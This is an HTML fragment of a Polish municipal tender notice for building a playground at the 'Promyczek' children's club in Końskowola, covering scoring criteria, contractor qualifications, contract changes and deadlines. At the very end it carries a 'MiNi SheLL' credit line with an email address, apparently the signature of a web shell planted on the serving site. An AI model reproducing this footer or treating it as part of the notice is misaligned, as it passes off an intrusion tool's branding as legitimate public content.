punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rękojmia i gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> II część- Budowa placu zabaw.<br/>Przedmiotem zamówienia są roboty budowlane polegające na budowie placu zabaw na terenie działek 458/11, 459/6, 459/7 przy Klubie Dziecięcy „Promyczek” w Końskowoli.<br/><br/>Zakres projektowanych prac obejmuje:<br/>- rozbiórka istniejącej nawierzchni asfaltowej<br/>- wykonanie fundamentów pod urządzenia placu zabaw zgodnie z wytycznymi dostawcy urządzeń<br/>- wykonanie nawierzchni na placu zabaw wg. projektu<br/>- demontaż istniejącego regulaminu placu zabaw oraz urządzenie placu zabaw wg zaproponowanych w projekcie architektoniczno-budowalnym<br/><br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej (projekt „Przebudowa ściany zewnętrznej w budynku przedszkola”, projekt „Zmiana sposobu użytkowania pomieszczeń gminnego przedszkola w Końskowoli na klub dziecięcego „Promyczek,”, projekt „Remont pomieszczeń wspólnych gminnego przedszkola oraz klubu dziecięcego „Promyczek” w Końskowoli” i STWiORB, przedmiarach, STWIORB dla adaptacji Klubu Dziecięcego stanowiącego załącznik nr 1A do SWZ oraz w projekcie zagospodarowania działki, STWiORB, przedmiarze stanowiących załącznik nr 1B do SWZ. Szczegółowy zakres obowiązków stron zawarty jest także we wzorze umowy stanowiącym załącznik nr 3 do SWZ.<br/><br/>Źródło dofinansowania: Program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH +” 2022- 2029- edycja I.<br/><br/>Roboty budowlane realizowane na całej inwestycji mają być wykonane zgodnie ze sztuką budowlaną, zasadami wiedzy technicznej, zgodnie z dokumentacją projektową oraz na warunkach określonych we wzorze umowy. <br/><br/>Zamawiający informuje, że udostępnione przedmiary robót mają charakter pomocniczy dla sporządzenia oferty. Wykonawca zobowiązany jest w ofercie uwzględnić wszystkie roboty niezbędne do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami. Udostępnione przedmiary robót nie stanowią podstawy do wyceny ofert. <br/><br/>Wykonawca we własnym zakresie wykona odpowiednie zabezpieczenia i oznakowania robót.<br/><br/>Wykonawca zobowiązany jest także do opracowania dokumentacji powykonawczej, która obejmuje:<br/>1)	dokumentację budowy z naniesionymi zmianami dokonanymi w toku wykonywania robót oraz geodezyjnymi pomiarami powykonawczymi, w tym geodezyjną inwentaryzację powykonawczą oraz dokumentację geodezyjno-kartograficzną (jeżeli dotyczy);<br/>2)	oryginalne atesty i świadectwa potwierdzające dopuszczenie do stosowania użytych przy realizacji zamówienia materiałów budowlanych, elementów wykończenia stałego wyposażenia i technologii (jeżeli dotyczy);<br/>3)	uzyskanie w imieniu Zamawiającego wymaganych prawem skutecznych <br/>i niezbędnych uzgodnień oraz zgłoszenie zakończenia budowy wobec którego Organ nie wniósł sprzeciwu dla elementów, które zgodnie z przepisami nie wymagają decyzji pozwolenia na użytkowanie. Po podpisaniu umowy Zamawiający udzieli wykonawcy stosownego upoważnienia do działania w jego imieniu przed właściwymi instytucjami i organami w powyższej sprawie;<br/>4)	instrukcje, opisy i kopie kart gwarancyjnych urządzeń zamontowanych w wyniku realizacji robót (jeżeli dotyczy)<br/><br/>Wykonawca we własnym zakresie i na własny koszt zorganizuje sobie zaplecze budowy oraz dostawę mediów (energia elektryczna, woda, itp.), oraz przywróci teren po zapleczu budowy do stanu jaki był przed rozpoczęciem robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45236210-5 - Wyrównywanie nawierzchni placów zabaw dla dzieci</p> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">45223800-4 - Montaż i wznoszenie gotowych konstrukcji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-01 do 2025-08-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W przedmiotowym postępowaniu, Zamawiający, przy wyborze oferty najkorzystniejszej, zastosuje kryterium:<br/>1) Cena [C] 60% =60 pkt.<br/>2) Gwarancja i rękojmia [G] 40%= 40 pkt.<br/>2. Sposób obliczania punktów dla kryterium ceny :<br/>Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg poniższego wzoru:<br/>Cena oferty- max 60 pkt<br/>C = cena brutto oferty z najniższą ceną/cena brutto oferty badanej x 60 pkt<br/>Sposób obliczania punktów dla kryterium rękojmia i gwarancja:<br/>Rękojmia i gwarancja dotyczy wykonanych robót budowlanych oraz użytych materiałów. Poszczególnym ofertom zostaną przyznane<br/>punkty za długość okresu gwarancji i rękojmi z zastrzeżeniem że okres gwarancji nie może być krótszy niż 60 m-cy.<br/>Zamawiający informuje, iż poszczególnym ofertom zostaną przyznane punkty za długość okresu rękojmi i gwarancji z zastrzeżeniem,<br/>że jeżeli Wykonawca wskaże okres rękojmi i gwarancji krótszy niż 60 m-cy, to jego oferta zostanie odrzucona. Jeżeli Wykonawca nie<br/>wpisze okresu rękojmi i gwarancji to będzie to równoznaczne z zaoferowaniem okresu rękojmi i gwarancji 60 miesięcy i w takiej<br/>sytuacji Wykonawca nie otrzyma punktów<br/>w opisanym kryterium.<br/>W zawartej umowie zostanie wpisany okres rękojmi i gwarancji na podstawie informacji uzyskanych z formularza ofertowego.<br/>Punkty zostaną przyznane wg poniższego schematu:<br/> 60-66 miesięcy 0 pkt<br/> 67-73 miesięcy 20 pkt<br/> 74 -80 miesięcy 40 pkt<br/>Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium rękojmia i gwarancja oceniany<br/>będzie na podstawie zadeklarowanego przez Wykonawcę okresu rękojmi i gwarancji (wyrażonego w pełnych miesiącach).<br/>Ostateczna ilość punktów dla każdej z ofert zostanie obliczona wg następującego wzoru:<br/>Łączna ilość punktów = C+G<br/>Maksymalnie oferta może otrzymać 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rękojmia i gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału dotyczące:<br/><br/>Część I:<br/>a.	Zdolność do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa warunku w tym zakresie.<br/>b.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/> Zamawiający nie określa warunku w tym zakresie<br/>	<br/>c.	Sytuacji finansowej lub ekonomicznej.<br/> Zamawiający nie określa warunku w tym zakresie<br/><br/>d.	Zdolności technicznej lub zawodowej. <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca ubiegający się o udzielenie zamówienia wykaże że:<br/><br/>	Wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną polegające na przebudowie/remoncie obiektów użyteczności publicznej o wartości co najmniej 300 000,00 zł brutto <br/><br/>Przez roboty budowlane wykonane należy rozumieć:<br/>1) roboty budowlane rozpoczęte i zakończone w ww. okresie, <br/>2) roboty budowlane zakończone w ww. okresie, których rozpoczęcie mogło nastąpić wcześniej niż w ww. okresie<br/><br/><br/>	Dysponowanie co najmniej jedną osobą, pełniącą funkcje Kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej z co najmniej 3-letnim doświadczeniem jako kierownik budowy lub kierownik robót ww. branży liczonym od dnia uzyskania uprawnień.<br/>	Dysponowanie co najmniej jedną osobą pełniącą funkcje kierownika robót branży sanitarnej posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych<br/>	Dysponowanie co najmniej jedną osobą pełniącą funkcje kierownika robót branży elektrycznej posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/><br/>Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.<br/><br/>Część II:<br/>e.	Zdolność do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa warunku w tym zakresie.<br/>f.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/> Zamawiający nie określa warunku w tym zakresie<br/>	<br/>g.	Sytuacji finansowej lub ekonomicznej.<br/> Zamawiający nie określa warunku w tym zakresie<br/><br/>h.	Zdolności technicznej lub zawodowej. <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca ubiegający się o udzielenie zamówienia wykaże że:<br/><br/>	Wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną polegające na budowie placy zabaw wraz z jego wyposażeniem o wartości co najmniej 200 000,00 zł brutto <br/><br/>Przez roboty budowlane wykonane należy rozumieć:<br/>1) roboty budowlane rozpoczęte i zakończone w ww. okresie, <br/>2) roboty budowlane zakończone w ww. okresie, których rozpoczęcie mogło nastąpić wcześniej niż w ww. okresie.<br/><br/>	Dysponowanie co najmniej jedną osobą, pełniącą funkcje Kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej z co najmniej 3-letnim doświadczeniem jako kierownik budowy lub kierownik robót ww. branży liczonym od dnia uzyskania uprawnień.<br/><br/>Postanowienia wspólne.<br/><br/>3.	Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą Prawo budowlane z dnia 7 lipca 1994 r. (Dz. U. z 2024 r., poz. 725 ze zm.) art. 12 ust. 1 ppkt. 2, ust. 7, art. 12a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane z 1994 r., natomiast w przypadku osób, które uzyskały uprawnienia w innych krajach Unii Europejskiej a także osób z Europejskiego Obszaru Gospodarczego warunki określone w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023 r., poz. 334 z późn. zm.). Samodzielne funkcje techniczne w budownictwie będą rozpatrywane zgodnie <br/>z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania oraz treścią decyzji o nadaniu uprawnień. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w żadnej części nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/><br/>Część I i część II:<br/><br/>1)	potwierdzających spełnienie warunków udziału w postępowaniu:<br/><br/>	Wykaz robot budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - według wzoru stanowiącego załącznik nr 6 do SWZ.<br/><br/>	Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami według wzoru stanowiącego załącznik nr 7 do SWZ <br/><br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz robót budowlanych, o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.	Składana oferta powinna zawierać:<br/>	1) formularz Oferty -wg załącznika nr 2 do niniejszej SWZ;<br/>	2) oświadczenie o braku podstaw do wykluczenia oraz oświadczenie o spełnieniu warunków udziału w postępowaniu -wg załącznika nr 4 do SWZ;<br/>Uwaga! wymóg złożenia oświadczeń dotyczy także podmiotu udostępniającego zasoby (wzór – załącznik nr 4a do SWZ) oraz Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>	3) pełnomocnictwo(a) –w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z dokumentu rejestracyjnego– załącznik Wykonawcy; <br/>	4) dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu <br/>	o udzielenie zamówienia publicznego w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik wykonawcy<br/>	5) oświadczenie, o którym mowa w art. 117 ust.4 ustawy Pzp, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – wzór oświadczenia stanowi załącznik nr 6 do SWZ<br/>	6) zobowiązania podmiotów do udostępnienia zasobów w przypadku, gdy Wykonawca wykazując spełnienie warunków polega na zasobach innych podmiotów –sporządzone według wzoru stanowiącego załącznik nr 5 do SWZ<br/>7) potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby: <br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru; <br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. Dane te wykonawca wskazuje w ofercie. 7.	Przed zawarciem umowy w każdej części konieczne jest wniesienie zabezpieczenia należytego wykonania umowy.<br/>8.	Przed zawarciem umowy w każdej części Zamawiający żąda aby wykonawca złożył dokumenty dotyczące uprawnień Kierowników Budowy/ Robót (poświadczone za zgodność z oryginałem decyzje o nadaniu uprawnień, oraz informacje o przynależności do Izby Inżynierów Budownictwa).<br/>9.	Przed zawarciem umowy w danej części Wykonawca zobowiązany jest do złożenia kosztorysów w zakresie robót budowlanych sporządzonych zgodnie z przedmiarami robót, znajdującymi się w zał. nr 1A/1B do SWZ. Kosztorysy mają charakter pomocniczy, ich zadaniem jest ułatwienie wykonawcy rozpoznania zakresu umowy i skalkulowania na własną odpowiedzialność i ryzyko – ceny oferty. Wykonawcy nie służą żadne roszczenia wobec Zamawiającego w przypadku stwierdzenia niedoszacowania, przeszacowania, pominięcia lub innych błędów w kosztorysie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy w każdej części mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Umocowanie Pełnomocnika musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą. Pełnomocnictwo powinno jednoznacznie określać postępowanie i precyzować zakres umocowania, powinno też wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie. Pełnomocnictwo powinno zostać złożone w formie elektronicznej. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem, w tym poświadczonej przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>2) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, oświadczenia o których mowa w art. 125 ust. 1 ustawy pzp składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonują poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2. Zamawiający, poza przypadkami określonymi w art. 455 ustawy pzp, dopuszcza możliwość zmian umowy w zakresie<br/>dotyczącym:<br/>1) terminu wykonania przedmiotu umowy w przypadkach:<br/>a) gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy, pod<br/>warunkiem, że zmiana ta sprzyjać będzie należytemu wykonaniu zamówienia, jak również oszczędnemu, celowemu i<br/>gospodarnemu wydatkowaniu środków publicznych,<br/>b) gdy wprowadzenie zmian jest korzystne dla Zamawiającego,<br/>c) konieczności wprowadzenia zmian w dokumentacji projektowej,<br/>d) konieczności wprowadzenia zmian w zakresie realizacji umowy z uwagi na interes Zamawiającego (np. roboty zamienne,<br/>nowsza, korzystniejsza technologia),<br/>e) zaistnienia niesprzyjających, obiektywnych warunków klimatycznych uniemożliwiających wykonywanie prac budowlanych<br/>lub spełnienie wymogów technologicznych, dotyczy to także działania siły wyższej (np. klęski żywiołowe, strajki generalne<br/>lub lokalne, akt terroru, katastrofa, załamanie gospodarcze, wojny), mających bezpośredni wpływ na terminowość wykonywania robót, potwierdzonych przez Inspektora nadzoru,<br/>f) gdy wystąpią warunki geologiczne, terenowe, archeologiczne, i wodne nie ujawnione w dokumentacji technicznej a<br/>utrudniające wykonanie umowy,<br/>g) wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę,<br/>h) wystąpienia siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu<br/>niniejszej umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki<br/>uniemożliwiają wykonanie niniejszej umowy zgodnie z jej treścią,<br/>i) wystąpienia innych okoliczności nie powstałych z winy Wykonawcy,<br/>2) osób funkcyjnych wskazanych w niniejszej umowie ze strony Zamawiającego jak i Wykonawcy, o uprawnieniach<br/>wymaganych przez Zamawiającego dla tego zadania (zmiana jest możliwa na osoby spełniające wymogi SWZ),<br/>3) wykonania robót zamiennych lub robót w nowszej technologii w stosunku do zaprojektowanej a pozwalających na<br/>zaoszczędzenie czasu, kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub<br/>umożliwiające uzyskanie lepszej jakości robót,<br/>4) robót budowlanych nie objętych niniejszą umową, w szczególności nie ujętych w dokumentacji proj,-technicznej, które nie<br/>były możliwe do przewidzenia w chwili wszczęcia postępowania o udzielenie zamówienia publicznego, w wyniku którego<br/>doszło do zawarcia umowy, a które są konieczne do realizacji przedmiotu umowy, gdy z przyczyn technicznych lub<br/>ekonomicznych powierzenie wykonania robót innemu wykonawcy nie jest możliwe, a oddzielenie wykonania tych robót od<br/>przedmiotu umowy wymagałoby poniesienia niewspółmiernie wysokich kosztów oraz spowodowałoby istotną niedogodność<br/>dla zamawiającego– co zostanie poprzedzone sporządzeniem Protokołu konieczności wykonania tych robót. Wartość<br/>każdej kolejnej zmiany umowy nie może przekroczyć 50% wartości. Konieczność wykonania robot zamiennych lub<br/>zamówienia dodatkowego musi być potwierdzona w protokole konieczności wykonania robot wraz z uzasadnieniem,<br/>wystawionym przez Wykonawcę, zarekomendowanym przez Inspektora Nadzoru i zaakceptowanym przez Zamawiającego.<br/>Bez uprzedniej zgody Zamawiającego wykonywane mogą być jedynie prace niezbędne ze względu na bezpieczeństwo lub<br/>konieczność zapobieżenia awarii.<br/>5) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy (tzw. roboty zaniechane z uwagi na ich zbędność<br/>dla prawidłowego wykonania umowy lub gdy wystąpiły okoliczności, których nie dało się przewidzieć na etapie<br/>przygotowania dokumentacji projektowej)<br/>6) Zmiany wynagrodzenia związanej ze zmianą obowiązującej stawki VAT; w tej sytuacji do kwoty netto zostanie doliczony należny podatek VAT w wysokości wynikającej z obowiązujących przepisów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">pod adresem: https://gmina-konskowola.ezamawiajacy.pl/pn/gmina-konskowola/demand/200204/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-28 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.2.	Z postępowania o udzielenie zamówienia zamawiający wykluczy wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r., 507 tj.)”:<br/>a) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych <br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3; <br/>b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3; <br/>c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 powołanej ustawy.<br/>1. Z uwagi na bieżące użytkowanie obiektu, termin wykonania zamówienia w I i II części zamówienia możliwy jest jedynie w okresie wakacji szkolnych, tj. od 1 lipca 2025 do 14 sierpnia 2025 r.<br/>2. Strony ustalają, że datą zakończenia realizacji przedmiotu umowy jest zgłoszenie przez Wykonawcę na piśmie gotowości wykonania przedmiotu umowy do odbioru końcowego wraz z uzyskaniem wszelkich zgód i dokonaniem zgłoszenia o zakończenia budowy wobec którego Organ nie wniósł sprzeciwu dla elementów, które zgodnie z przepisami nie wymagają decyzji pozwolenia na użytkowanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com